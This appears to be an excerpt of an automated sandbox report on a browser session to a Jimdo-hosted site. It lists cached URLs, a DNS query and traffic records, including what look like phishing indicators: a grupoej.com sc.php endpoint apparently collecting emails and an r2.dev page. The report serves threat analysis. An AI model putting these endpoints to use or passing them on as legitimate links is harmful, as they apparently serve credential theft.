Source: chromecache_155.2.dr	String found in binary or memory: ssig sind, Facebook Ireland Ltd, 4 Grand Canal Square, Grand Canal Harbour, Dublin 2, Irland\nCookie-Namen und Lebenszeiten: _fbp (Lebensdauer: 2 Jahre), _fbc(Lebensdauer: 2 Jahre)",cmsCookieBannerFacebookPixelPolicyUrl:"https://www.facebook.com/policies/cookies",cmsCookieBannerFacebookPixelPrivacyPolicy:"https://www.facebook.com/policy.php",cmsCookieBannerFacebookPixelTitle:"Facebook",cmsCookieBannerGADescription:"Diese Cookies sammeln anonymisierte Informationen zu Analysezwecken equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: znixulyp.com

Source: unknown

HTTP traffic detected: POST /anon HTTP/1.1Host: at.prod.jimdo.systemsConnection: keep-aliveContent-Length: 307sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://doc-36.jimdosite.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://doc-36.jimdosite.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 17:39:19 GMTContent-Type: text/htmlContent-Length: 27242Connection: closeServer: cloudflareCF-RAY: 87666efecb88135b-ATL

Source: chromecache_137.2.dr	String found in binary or memory: http://fontawesome.io
Source: chromecache_137.2.dr	String found in binary or memory: http://fontawesome.io/license
Source: chromecache_212.2.dr	String found in binary or memory: http://github.com/janl/mustache.js
Source: chromecache_155.2.dr	String found in binary or memory: http://tools.google.com/dlpage/gaoptout
Source: chromecache_128.2.dr	String found in binary or memory: https://account.e.jimdo.com/login
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: https://account.e.jimdo.com/signup/apple
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: https://account.e.jimdo.com/signup/email
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: https://account.e.jimdo.com/signup/facebook
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: https://account.e.jimdo.com/signup/google
Source: chromecache_203.2.dr	String found in binary or memory: https://accounts.google.com/gsi/
Source: chromecache_203.2.dr	String found in binary or memory: https://accounts.google.com/gsi/button
Source: chromecache_203.2.dr	String found in binary or memory: https://accounts.google.com/gsi/fedcm.json
Source: chromecache_203.2.dr	String found in binary or memory: https://accounts.google.com/gsi/fedcmcsp?client_id=
Source: chromecache_203.2.dr	String found in binary or memory: https://accounts.google.com/gsi/iframe/select
Source: chromecache_203.2.dr	String found in binary or memory: https://accounts.google.com/gsi/log
Source: chromecache_203.2.dr	String found in binary or memory: https://accounts.google.com/gsi/revoke
Source: chromecache_203.2.dr	String found in binary or memory: https://accounts.google.com/gsi/select
Source: chromecache_203.2.dr	String found in binary or memory: https://accounts.google.com/gsi/status
Source: chromecache_203.2.dr	String found in binary or memory: https://accounts.google.com/gsi/style
Source: chromecache_203.2.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/iframe
Source: chromecache_203.2.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/v2/auth
Source: chromecache_155.2.dr	String found in binary or memory: https://admin.typeform.com/to/dwk6gt/?typeform-source=www.typeform.com
Source: chromecache_170.2.dr	String found in binary or memory: https://adservice.google.com/pagead/regclk
Source: chromecache_170.2.dr	String found in binary or memory: https://adservice.googlesyndication.com/pagead/regclk
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://aka.ms/privacyresponse
Source: chromecache_155.2.dr	String found in binary or memory: https://bandcamp.com/privacy_shield
Source: chromecache_201.2.dr	String found in binary or memory: https://careers.jimdo.com/
Source: chromecache_170.2.dr	String found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_120.2.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_150.2.dr	String found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback
Source: chromecache_170.2.dr	String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: chromecache_170.2.dr	String found in binary or memory: https://deploy.mopinion.com/js/pastease.js
Source: chromecache_162.2.dr	String found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
Source: chromecache_203.2.dr	String found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#cross_origin)
Source: chromecache_203.2.dr	String found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#display_moment
Source: chromecache_203.2.dr	String found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#layout
Source: chromecache_203.2.dr	String found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#skipped_moment
Source: chromecache_139.2.dr, chromecache_211.2.dr, chromecache_163.2.dr	String found in binary or memory: https://fonts.jimstatic.com/
Source: chromecache_139.2.dr, chromecache_211.2.dr, chromecache_163.2.dr	String found in binary or memory: https://fonts.jimstatic.com/css?display=swap&family=Poppins:600
Source: chromecache_139.2.dr, chromecache_211.2.dr, chromecache_163.2.dr	String found in binary or memory: https://fonts.jimstatic.com/css?display=swap&family=Roboto:400
Source: chromecache_204.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1JlFc-K.woff2)
Source: chromecache_204.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1xlFQ.woff2)
Source: chromecache_204.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1JlFc-K.woff2)
Source: chromecache_204.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu72xKOzY.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)
Source: chromecache_182.2.dr	String found in binary or memory: https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)
Source: chromecache_201.2.dr	String found in binary or memory: https://forschungswerkstatt.jimdo.com/
Source: chromecache_170.2.dr	String found in binary or memory: https://google.com
Source: chromecache_170.2.dr	String found in binary or memory: https://googleads.g.doubleclick.net
Source: chromecache_150.2.dr	String found in binary or memory: https://grupoej.com/awazwwazq/host%5b24.0%5d/admin/js/sc.php?r=ZW0sZW1haWwsYWRk
Source: chromecache_201.2.dr	String found in binary or memory: https://help.business.jimdo.com/hc/de
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://help.hotjar.com/hc/en-us/articles/115011789248-Hotjar-Cookies
Source: chromecache_155.2.dr	String found in binary or memory: https://help.instagram.com/1896641480634370?ref=ig
Source: chromecache_155.2.dr	String found in binary or memory: https://help.instagram.com/519522125107875
Source: chromecache_155.2.dr	String found in binary or memory: https://help.twitter.com/en/rules-and-policies/twitter-cookies
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://impact.com/privacy-policy/
Source: chromecache_201.2.dr	String found in binary or memory: https://jimdo-community-events.jimdosite.com/events/
Source: chromecache_139.2.dr, chromecache_211.2.dr, chromecache_163.2.dr	String found in binary or memory: https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/
Source: chromecache_139.2.dr, chromecache_211.2.dr, chromecache_163.2.dr	String found in binary or memory: https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/b98099b58f789b786e66.js
Source: chromecache_139.2.dr, chromecache_211.2.dr, chromecache_163.2.dr	String found in binary or memory: https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/d330293187a93ee79023.css
Source: chromecache_139.2.dr, chromecache_211.2.dr, chromecache_163.2.dr	String found in binary or memory: https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/default-website-favicon.
Source: chromecache_139.2.dr, chromecache_211.2.dr, chromecache_163.2.dr	String found in binary or memory: https://jimdo-storage.freetls.fastly.net/
Source: chromecache_139.2.dr	String found in binary or memory: https://jimdo-storage.freetls.fastly.net/image/454238981/23f5ed5a-6c3b-4b7b-a128-0fd6b1efd2a9.png?qu
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://launchdarkly.com/policies/privacy/
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: https://logo.e.jimdo.com/?lng=en
Source: chromecache_203.2.dr	String found in binary or memory: https://oauth2.googleapis.com/revoke
Source: chromecache_170.2.dr	String found in binary or memory: https://pagead2.googlesyndication.com
Source: chromecache_170.2.dr	String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chromecache_155.2.dr	String found in binary or memory: https://policies.google.com/)
Source: chromecache_155.2.dr	String found in binary or memory: https://policies.google.com/privacy?hl=de
Source: chromecache_215.2.dr	String found in binary or memory: https://policies.google.com/privacy?hl=en
Source: chromecache_155.2.dr	String found in binary or memory: https://policies.google.com/privacy?hl=es
Source: chromecache_155.2.dr	String found in binary or memory: https://policies.google.com/privacy?hl=fr
Source: chromecache_155.2.dr	String found in binary or memory: https://policies.google.com/privacy?hl=it
Source: chromecache_155.2.dr	String found in binary or memory: https://policies.google.com/privacy?hl=ja
Source: chromecache_155.2.dr	String found in binary or memory: https://policies.google.com/privacy?hl=nl
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://policy.pinterest.com/en-gb/privacy-policy
Source: chromecache_155.2.dr	String found in binary or memory: https://policy.pinterest.com/en/cookies
Source: chromecache_155.2.dr	String found in binary or memory: https://policy.pinterest.com/en/privacy-policy
Source: chromecache_201.2.dr	String found in binary or memory: https://presse.jimdo.com/
Source: chromecache_139.2.dr	String found in binary or memory: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html
Source: chromecache_170.2.dr	String found in binary or memory: https://s.pinimg.com/ct/core.js
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://safety.google/privacy/privacy-controls/
Source: chromecache_155.2.dr	String found in binary or memory: https://soundcloud.com/pages/privacy
Source: chromecache_170.2.dr	String found in binary or memory: https://static.ads-twitter.com/uwt.js
Source: chromecache_155.2.dr	String found in binary or memory: https://stripe.com/cookies-policy/legal
Source: chromecache_155.2.dr	String found in binary or memory: https://stripe.com/privacy
Source: chromecache_215.2.dr	String found in binary or memory: https://support.google.com/policies/contact/general_privacy_form
Source: chromecache_170.2.dr	String found in binary or memory: https://td.doubleclick.net
Source: chromecache_155.2.dr	String found in binary or memory: https://tools.google.com/dlpage/gaoptout)
Source: chromecache_155.2.dr, chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://twitter.com/en/privacy
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: https://twitter.com/jimdo
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://twitter.com/personalization
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://twitter.ethicspointvp.com/custom/twitter/forms/data/form_data.asp
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://usercentrics.com/privacy-policy/
Source: chromecache_155.2.dr	String found in binary or memory: https://vimeo.com/api/oembed.json?url=
Source: chromecache_155.2.dr	String found in binary or memory: https://vimeo.com/cookie_policy
Source: chromecache_155.2.dr	String found in binary or memory: https://vimeo.com/privacy
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://vwo.com/compliance/privacy-principles/
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://vwo.com/opt-out/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.apple.com/de/legal/privacy/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.apple.com/legal/privacy/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.apple.com/legal/privacy/de-ww/cookies/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.apple.com/legal/privacy/es/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.apple.com/legal/privacy/fr-ww/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.apple.com/legal/privacy/it/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.apple.com/legal/privacy/jp/
Source: chromecache_155.2.dr, chromecache_189.2.dr, chromecache_163.2.dr, chromecache_215.2.dr	String found in binary or memory: https://www.cloudflare.com/cookie-policy/
Source: chromecache_162.2.dr	String found in binary or memory: https://www.cloudflare.com/favicon.ico
Source: chromecache_155.2.dr	String found in binary or memory: https://www.cloudflare.com/ja-jp/cookie-policy/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.cloudflare.com/ja-jp/privacypolicy/
Source: chromecache_189.2.dr, chromecache_163.2.dr, chromecache_215.2.dr	String found in binary or memory: https://www.cloudflare.com/privacypolicy/
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://www.cognigy.com/privacy-policy
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://www.datadoghq.com/legal/privacy/
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://www.fullstory.com/legal/privacy/
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://www.fullstory.com/optout
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://www.getbeamer.com/privacy-policy/#third-parties-transfers
Source: chromecache_170.2.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: chromecache_170.2.dr	String found in binary or memory: https://www.google.com
Source: chromecache_155.2.dr	String found in binary or memory: https://www.google.com/analytics/terms)
Source: chromecache_170.2.dr	String found in binary or memory: https://www.googleadservices.com
Source: chromecache_170.2.dr	String found in binary or memory: https://www.googletagmanager.com
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://www.hotjar.com/legal/policies/privacy
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: https://www.instagram.com/jimdo_global/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo-status.com/)
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo-status.com/).
Source: chromecache_144.2.dr, chromecache_181.2.dr	String found in binary or memory: https://www.jimdo.com
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/addon/legal-text-generator/)
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/de/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/de/addon/legal-text-generator)
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/es/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/es/addon/legal-text-generator/)
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/es/addon/legal-text-generator/).
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/fr/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/fr/addon/legal-text-generator/)
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/info/privacy/)
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/it/addon/legal-text-generator/)
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/jp/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/jp/news/)
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/nl/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.jimdo.com/nl/addon/legal-text-generator/)
Source: chromecache_128.2.dr	String found in binary or memory: https://www.jimdo.com/website/how-to-create/
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: https://www.jimdo.com/website/online-store/
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: https://www.jimdo.com/website/portfolio/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.kddi-webcommunications.co.jp/privacy)
Source: chromecache_155.2.dr	String found in binary or memory: https://www.paypal.com/ie/webapps/mpp/ua/cookie-full
Source: chromecache_155.2.dr	String found in binary or memory: https://www.paypal.com/ie/webapps/mpp/ua/privacy-full
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: https://www.pinterest.de/JimdoEN/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.spotify.com/de/legal/privacy-policy/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.spotify.com/es/legal/privacy-policy/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.spotify.com/fr/legal/privacy-policy/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.spotify.com/it/legal/privacy-policy/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.spotify.com/jp/legal/privacy-policy/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.spotify.com/legal/cookies-policy/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.spotify.com/legal/privacy-policy/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.tiktok.com/legal/cookie-policy?lang=en
Source: chromecache_155.2.dr	String found in binary or memory: https://www.tiktok.com/legal/privacy-policy-eea?lang=de
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: https://www.tiktok.com/legal/privacy-policy?lang=en#section-1
Source: chromecache_155.2.dr	String found in binary or memory: https://www.tumblr.com/privacy
Source: chromecache_155.2.dr	String found in binary or memory: https://www.twitch.tv/p/de-de/legal/cookie-notice/
Source: chromecache_155.2.dr	String found in binary or memory: https://www.twitch.tv/p/de-de/legal/privacy-notice/
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: https://www.youtube.com/user/jimdo

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
